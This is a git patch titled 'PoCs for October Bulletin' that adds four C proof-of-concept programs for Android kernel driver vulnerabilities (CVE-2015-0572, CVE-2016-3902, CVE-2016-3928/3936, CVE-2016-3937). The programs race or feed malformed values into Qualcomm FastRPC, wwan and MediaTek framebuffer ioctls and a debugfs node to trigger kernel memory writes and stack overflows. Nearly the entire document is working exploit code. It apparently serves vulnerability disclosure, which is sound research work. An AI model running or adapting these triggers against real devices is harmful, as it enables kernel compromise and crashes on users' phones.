From 21d9ce89d90fa34925de78462c243495448fbd96 Mon Sep 17 00:00:00 2001
From: Scott Bauer <sbauer@plzdonthack.me>
Date: Mon, 3 Oct 2016 13:00:30 -0600
Subject: [PATCH] PoCs for October Bulletin

Signed-off-by: Scott Bauer <sbauer@plzdonthack.me>
---
 CVE-2015-0572.c                       | 127 +++++++++++++++
 CVE-2016-3902.c                       |  91 +++++++++++
 CVE-2016-3928-and-CVE-2016-3936-mtk.c | 213 ++++++++++++++++++++++++++
 CVE-2016-3937.c                       |  33 ++++
 4 files changed, 464 insertions(+)
 create mode 100644 CVE-2015-0572.c
 create mode 100644 CVE-2016-3902.c
 create mode 100644 CVE-2016-3928-and-CVE-2016-3936-mtk.c
 create mode 100644 CVE-2016-3937.c

diff --git a/CVE-2015-0572.c b/CVE-2015-0572.c
new file mode 100644
index 0000000..d1f948d
--- /dev/null
+++ b/CVE-2015-0572.c
@@ -0,0 +1,127 @@
+/* CVE-2015-0572.c
+ *
+ * October BUlletin:
+ *
+ * https://code.google.com/p/android/issues/detail?id=211546
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <inttypes.h>
+#include <pthread.h>
+
+static const char *dev = "/dev/adsprpc-smd";
+
+typedef uint32_t compat_uint_t;
+typedef uint32_t compat_uptr_t;
+typedef uint64_t __uint128_t;
+
+struct compat_fastrpc_ioctl_invoke {
+        compat_uint_t handle;   /* remote handle */
+        compat_uint_t sc;       /* scalars describing the data */
+        compat_uptr_t pra;      /* remote arguments list */
+};
+
+struct compat_fastrpc_ioctl_invoke_fd {
+        struct compat_fastrpc_ioctl_invoke inv;
+	compat_uptr_t fds;      /* fd list */
+};
+
+struct fastrpc_ioctl_invoke {
+        uint32_t handle;        /* remote handle */
+        uint32_t sc;            /* scalars describing the data */
+        void *pra;      /* remote arguments list */
+	void *pra_2; /* need to make this struct 64 bit compat */
+};
+
+struct fastrpc_ioctl_invoke_fd {
+        struct fastrpc_ioctl_invoke inv;
+        int *fds;               /* fd list */
+	int *fds2;  /* 64 bit ptr */
+};
+
+
+#define COMPAT_FASTRPC_IOCTL_INVOKE_FD \
+	_IOWR('R', 4, struct compat_fastrpc_ioctl_invoke_fd)
+
+
+
+volatile int trigger = 0;
+volatile int trigger1 = 0;
+static void *ptr_change(void *hdr)
+{
+	//void *mal = malloc(4096);
+	volatile unsigned int counter = 0;
+	struct fastrpc_ioctl_invoke_fd test;
+	register int sp asm("sp");
+	//struct fastrpc_ioctl_invoke_fd *fd = sp - sizeof(struct fastrpc_ioctl_invoke_fd);
+	volatile struct fastrpc_ioctl_invoke_fd *fd = hdr;
+	printf("hdr is at %p and sp in thread is %x and test is at %p\n", hdr, sp, &test);
+
+	trigger1 = 1;
+	while (trigger == 0) { };
+	while (trigger != 0) {
+		fd->fds2 = 0x41414141;
+		fd->fds = 0x41414141;
+		fd->inv.sc = 0xbadbeef2;
+		fd->inv.handle = 0xbadbeef;
+		fd->inv.pra = 0xbadbeef0;
+		fd->inv.pra_2 = 0xbadc0de0;
+	}
+        trigger1 = 0;
+	//free(mal);
+	printf("returning pthread\n");
+        return NULL;
+}
+
+void print(volatile char *test) {
+	int i;
+	for (i = 0; i < sizeof(struct fastrpc_ioctl_invoke_fd) + 64; i++)
+		printf("%x ", *(((volatile char *)test) + i));
+
+
+}
+
+static void do_kernel_write(int fd)
+{
+	pthread_t race_car;
+	int counter, i;
+	register int sp asm("sp");
+	struct compat_fastrpc_ioctl_invoke_fd invoke = { 0 };
+	void *ptr = (void*) sp;
+	printf("sp is at %x\n", sp);
+	invoke.inv.sc = 0xFFFFFFFF;
+	invoke.fds = malloc(65535);
+	for (i = 256; i <= 16384+4096; i += sizeof(struct fastrpc_ioctl_invoke_fd)) {
+		printf("%d\n", i);
+		pthread_create(&race_car, NULL, ptr_change, (void *)
+			       ptr - i);
+		while(trigger1 != 1) {}
+		trigger = 1;
+
+		for (counter = 0; counter < 5000; counter++)
+			ioctl(fd, COMPAT_FASTRPC_IOCTL_INVOKE_FD, &invoke);
+		printf("ioctl done\n");
+
+		trigger = 0;
+		pthread_join(race_car, NULL);
+	}
+}
+int main(void) {
+	int fd;
+
+	fd = open(dev, O_RDWR);
+	if (fd < 0) {
+		printf("Couldn't open %s with error %s\n", dev, strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+
+	do_kernel_write(fd);
+
+}
diff --git a/CVE-2016-3902.c b/CVE-2016-3902.c
new file mode 100644
index 0000000..6f015b4
--- /dev/null
+++ b/CVE-2016-3902.c
@@ -0,0 +1,91 @@
+/* CVE-2016-3902.c
+ *
+ * October BUlletin
+ *
+ * https://code.google.com/p/android/issues/detail?id=214974
+ *
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdbool.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <net/if.h>
+#include <sys/types.h>
+
+#define IPA_INT_MAX     ((int)(~0U>>1))
+#define IPA_INT_MIN     (-IPA_INT_MAX - 1)
+#define QMI_IPA_MAX_FILTERS_V01 64
+
+struct ipa_filter_handle_to_index_map_v01 {
+        uint32_t filter_handle;
+        uint32_t filter_index;
+};  /* Type */
+
+enum ipa_qmi_result_type_v01 {
+        /* To force a 32 bit signed enum. Do not change or use*/
+        IPA_QMI_RESULT_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN,
+        IPA_QMI_RESULT_SUCCESS_V01 = 0,
+        IPA_QMI_RESULT_FAILURE_V01 = 1,
+        IPA_QMI_RESULT_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX,
+};
+
+
+struct ipa_fltr_installed_notif_req_msg_v01 {
+        uint32_t source_pipe_index;
+        enum ipa_qmi_result_type_v01 install_status;
+        uint32_t filter_index_list_len;
+        struct ipa_filter_handle_to_index_map_v01
+	filter_index_list[QMI_IPA_MAX_FILTERS_V01];
+        uint8_t embedded_pipe_index_valid;
+        uint32_t embedded_pipe_index;
+        uint8_t retain_header_valid;
+        uint8_t retain_header;
+        uint8_t embedded_call_mux_id_valid;
+        uint32_t embedded_call_mux_id;
+        uint8_t num_ipv4_filters_valid;
+        uint32_t num_ipv4_filters;
+        uint8_t num_ipv6_filters_valid;
+        uint32_t num_ipv6_filters;
+        uint8_t start_ipv4_filter_idx_valid;
+        uint32_t start_ipv4_filter_idx;
+        uint8_t start_ipv6_filter_idx_valid;
+        uint32_t start_ipv6_filter_idx;
+};  /* Message */
+
+
+#define WAN_IOC_MAGIC 0x69
+
+#define WAN_IOCTL_ADD_FLT_INDEX         2
+
+#define WAN_IOC_ADD_FLT_RULE_INDEX _IOWR(WAN_IOC_MAGIC, \
+                WAN_IOCTL_ADD_FLT_INDEX, \
+					 struct ipa_fltr_installed_notif_req_msg_v01 *)
+
+
+static const char* dev = "/dev/wwan_ioctl";
+
+int main(void)
+{
+	int fd;
+	struct ipa_fltr_installed_notif_req_msg_v01 msg = { 0 };
+	fd = open(dev, O_RDWR);
+	if (fd < 0) {
+		printf("Failed to open %s with %s\n", dev, strerror(errno));
+		return EXIT_FAILURE;
+	}
+
+	msg.filter_index_list_len = 0xBADC0DE;
+	msg.filter_index_list[0].filter_index = 0; /* technically already set to 0 */
+	/* set the pipe index to fail on the check */
+	msg.source_pipe_index = 0xbeef;
+
+	ioctl(fd, WAN_IOC_ADD_FLT_RULE_INDEX, &msg);
+
+}
diff --git a/CVE-2016-3928-and-CVE-2016-3936-mtk.c b/CVE-2016-3928-and-CVE-2016-3936-mtk.c
new file mode 100644
index 0000000..ee56397
--- /dev/null
+++ b/CVE-2016-3928-and-CVE-2016-3936-mtk.c
@@ -0,0 +1,213 @@
+/* CVE-2016-3928-and-CVE-2016-3936-mtk.c
+ *
+ * October BUlletin
+ *
+ * https://code.google.com/p/android/issues/detail?id=215336
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <inttypes.h>
+
+
+#define MTK_IOW(num, dtype)     _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype)     _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype)    _IOWR('O', num, dtype)
+#define MTK_IO(num)             _IO('O', num)
+
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp)  (((id) << 8) | (bpp))
+typedef enum {
+	MTK_FB_FORMAT_UNKNOWN = 0,
+
+	MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+	MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+	MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+	MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
+	MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+	MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+	MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+	MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+	MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+	MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+	MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+	MTK_FB_FORMAT_BPP_MASK = 0xFF,
+} MTK_FB_FORMAT;
+
+typedef enum {
+        MTK_FB_ORIENTATION_0 = 0,
+        MTK_FB_ORIENTATION_90 = 1,
+        MTK_FB_ORIENTATION_180 = 2,
+        MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+typedef enum {
+        LAYER_2D = 0,
+        LAYER_3D_SBS_0 = 0x1,
+        LAYER_3D_SBS_90 = 0x2,
+        LAYER_3D_SBS_180 = 0x3,
+        LAYER_3D_SBS_270 = 0x4,
+        LAYER_3D_TAB_0 = 0x10,
+        LAYER_3D_TAB_90 = 0x20,
+        LAYER_3D_TAB_180 = 0x30,
+        LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+
+struct fb_overlay_layer {
+        unsigned int layer_id;
+        unsigned int layer_enable;
+
+        void *src_base_addr;
+        void *src_phy_addr;
+        unsigned int src_direct_link;
+        MTK_FB_FORMAT src_fmt;
+        unsigned int src_use_color_key;
+        unsigned int src_color_key;
+        unsigned int src_pitch;
+        unsigned int src_offset_x, src_offset_y;
+        unsigned int src_width, src_height;
+
+        unsigned int tgt_offset_x, tgt_offset_y;
+        unsigned int tgt_width, tgt_height;
+        MTK_FB_ORIENTATION layer_rotation;
+        MTK_FB_LAYER_TYPE layer_type;
+        MTK_FB_ORIENTATION video_rotation;
+
+        unsigned int isTdshp;   /* set to 1, will go through tdshp first, then layer blending, then to color */
+
+        int next_buff_idx;
+        int identity;
+        int connected_type;
+        unsigned int security;
+        unsigned int alpha_enable;
+        unsigned int alpha;
+        int fence_fd;           /* 8135 */
+        int ion_fd;             /* 8135 CL 2340210 */
+};
+
+#define MTKFB_SET_OVERLAY_LAYER                MTK_IOW(0, struct fb_overlay_layer)
+
+
+/** START FOR FB FORMAT ID */
+
+struct fb_slt_catpure {
+        MTK_FB_FORMAT format;
+        volatile char *outputBuffer;
+        unsigned int wdma_width;
+        unsigned int wdma_height;
+};
+
+#define MTKFB_SLT_AUTO_CAPTURE                 MTK_IOWR(27, struct fb_slt_catpure)
+
+
+
+/** START DEFINES FOR IF_INFORMATION_KERNEL_WRITE **/
+typedef enum {
+	DISPIF_TYPE_DBI = 0,
+	DISPIF_TYPE_DPI,
+	DISPIF_TYPE_DSI,
+	DISPIF_TYPE_DPI0,
+	DISPIF_TYPE_DPI1,
+	DISPIF_TYPE_DSI0,
+	DISPIF_TYPE_DSI1,
+	HDMI = 7,
+	HDMI_SMARTBOOK,
+                MHL
+} MTKFB_DISPIF_TYPE;
+
+typedef enum {
+	DISPIF_MODE_VIDEO = 0,
+	DISPIF_MODE_COMMAND
+} MTKFB_DISPIF_MODE;
+
+typedef struct mtk_dispif_info {
+	unsigned int display_id;
+	unsigned int isHwVsyncAvailable;
+	MTKFB_DISPIF_TYPE displayType;
+	unsigned int displayWidth;
+	unsigned int displayHeight;
+	unsigned int displayFormat;
+	MTKFB_DISPIF_MODE displayMode;
+	unsigned int vsyncFPS;
+	unsigned int physicalWidth;
+	unsigned int physicalHeight;
+	unsigned int isConnected;
+	unsigned int lcmOriginalWidth;  /* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+	unsigned int lcmOriginalHeight; /* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+} mtk_dispif_info_t;
+
+
+#define MTKFB_GET_DISPLAY_IF_INFORMATION       MTK_IOR(22, mtk_dispif_info_t)
+
+/* END DEFINES FOR IF_INFORMATION */
+
+static void do_display_if_information_kernel_write(int fd)
+{
+	mtk_dispif_info_t mediatek_is_best_tek = { 0 };
+	mediatek_is_best_tek.display_id = 0xBADACCE5;
+	ioctl(fd, MTKFB_GET_DISPLAY_IF_INFORMATION, &mediatek_is_best_tek);
+	printf("Didn't work!, adjust break_stuff number, but keep it negative\n");
+}
+
+static void do_slt_auto_capture_kernel_write(int fd)
+{
+
+	struct fb_slt_catpure cap = { 0 };
+	cap.outputBuffer =(void*) 0xBADACCE5;
+	cap.format = MTK_FB_FORMAT_BPP_MASK;
+	cap.wdma_width = 4096;
+	cap.wdma_height = 4096;
+
+	ioctl(fd, MTKFB_SLT_AUTO_CAPTURE, &cap);
+	printf("Didn't Work!, sorry!\n");
+}
+
+
+static void do_set_overlay_layer_kernel_write(int fd)
+{
+	struct fb_overlay_layer lay = { 0 };
+	lay.layer_id = 0xBADACCE5;
+	lay.src_fmt = MTK_FB_FORMAT_BPP_MASK;
+
+	/* Lets smash some stack buffers */
+	lay.layer_enable = 1;
+
+	ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &lay);
+	printf("Didnt work!, adjust layer_id\n");
+}
+
+/* DEPRICATED
+static void do_capture_frame_buffer_kernel_write(int fd)
+{
+	
+
+}
+*/
+int main(int argc, char **argv)
+{
+	int fd, i;
+
+	if (argc < 2) {
+		printf("Please supply the mtk frame buffer dev node\n");
+		return EXIT_FAILURE;
+	}
+
+	fd = open(argv[1], O_RDWR);
+
+	if (fd < 0) {
+		printf("Couldn't open %s with error %s\n", argv[1], strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+
+	do_display_if_information_kernel_write(fd);
+	/** DEPRICATED do_capture_frame_buffer_kernel_write(fd);*/
+	do_slt_auto_capture_kernel_write(fd);
+	do_set_overlay_layer_kernel_write(fd);
+}
diff --git a/CVE-2016-3937.c b/CVE-2016-3937.c
new file mode 100644
index 0000000..5b7237d
--- /dev/null
+++ b/CVE-2016-3937.c
@@ -0,0 +1,33 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <inttypes.h>
+
+
+static const char *dev = "/sys/kernel/debug/mtkfb";
+
+
+
+int main(void)
+{
+	int fd;
+
+	const char *exploit_str = "regw:BADACCE54141414141";
+	const char *exploit_str1 = "regw:BADACCE5 4141414141";
+	const char *exploit_str2 = "regw: BADACCE5 4141414141";
+
+	fd = open(dev, O_RDWR);
+	if (fd < 0) {
+		printf("Couldn't open %s with error %s\n", dev, strerror(errno));
+		return EXIT_FAILURE;
+	}
+	write(fd, exploit_str, strlen(exploit_str));
+	write(fd, exploit_str1, strlen(exploit_str1));
+	write(fd, exploit_str2, strlen(exploit_str2));
+
+}